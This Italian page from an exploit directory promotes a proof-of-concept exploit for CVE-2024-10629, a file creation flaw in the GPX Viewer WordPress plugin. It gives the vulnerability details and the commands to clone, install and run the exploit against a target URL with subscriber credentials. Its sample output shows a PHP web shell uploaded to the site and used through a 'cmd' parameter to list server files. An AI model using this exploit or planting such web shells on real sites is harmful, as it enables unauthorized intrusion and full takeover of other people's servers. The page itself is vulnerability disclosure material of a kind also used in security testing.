Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-10629 — GPX Viewer <= 2.2.8 - Creazione Arbitraria di File Autenticata (Abbonato+) | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-10629
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2024-10629

CVE-2024-10629

GPX Viewer <= 2.2.8 - Creazione Arbitraria di File Autenticata (Abbonato+)

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛠️ Exploit GPX Viewer (CVE-2024-10629)

Questo repository contiene un proof-of-concept exploit per il plugin GPX Viewer per WordPress, che è vulnerabile alla creazione arbitraria di file (CVE-2024-10629). La vulnerabilità consente ad attaccanti autenticati con accesso a livello di abbonato o superiore di creare file arbitrari sul server del sito interessato, portando potenzialmente all'esecuzione remota di codice.

📝 Dettagli CVE

  • CVE ID: CVE-2024-10629
  • Pubblicato: 2024-11-13
  • Aggiornato: 2024-11-13
  • Plugin vulnerabile: GPX Viewer <= 2.2.8
  • Tipo di vulnerabilità: Creazione arbitraria di file (Autenticato, Abbonato+)
  • Punteggio: 8.8 ALTO
  • Gravità: ALTA
  • Versione: 3.1
  • Stringa vettoriale: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Descrizione

Il plugin GPX Viewer per WordPress è vulnerabile alla creazione arbitraria di file a causa della mancanza di un controllo delle capacità e della validazione del tipo di file nella funzione gpxv_file_upload() in tutte le versioni fino alla 2.2.8 inclusa. Ciò consente ad attaccanti autenticati, con accesso a livello di abbonato o superiore, di creare file arbitrari sul server del sito interessato, rendendo possibile l'esecuzione remota di codice.

🚀 Funzionalità

  • Login automatico utilizzando nome utente e password forniti.
  • Verifica della versione del plugin GPX Viewer.
  • Carica una shell PHP sul server.
  • Verifica il caricamento riuscito della shell.
  • Esegue comandi sul server attraverso la shell caricata.

📚 Utilizzo

Prerequisiti

  • Python 3.x
  • libreria requests

Esecuzione dell'exploit

  1. Clona il repository:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-10629/
    cd CVE-2024-10629
    
  2. Installa la libreria richiesta:

    root@kitploit:~
    pip install requests
    
  3. Esegui l'exploit:

    root@kitploit:~
    python exploit.py -u <target_url> -un <username> -p <password>
    

    Sostituisci <target_url>, <username> e <password> con i valori appropriati.

Esempio

root@kitploit:~
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password

Output

Lo script mostrerà la versione del plugin e verificherà se è vulnerabile. Effettuerà quindi l'accesso utilizzando le credenziali fornite e tenterà di caricare la shell. In caso di successo, verificherà il caricamento della shell ed eseguirà un comando di esempio (ls).

root@kitploit:~
[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...

Comandi di esempio

  • ls = Mostra i file
  • uname -a = Mostra le informazioni di sistema

⚠️ Dichiarazione di non responsabilità

Questo exploit è destinato esclusivamente a scopi educativi e test autorizzati. L'uso non autorizzato di questo exploit contro sistemi di cui non si possiede o non si ha esplicito permesso di testare è illegale e non etico. Gli autori e i contributori di questo repository non sono responsabili per qualsiasi uso improprio o danno causato da questo exploit.


Di: Khaled Alenazi (Nxploit)

Scarica lo strumento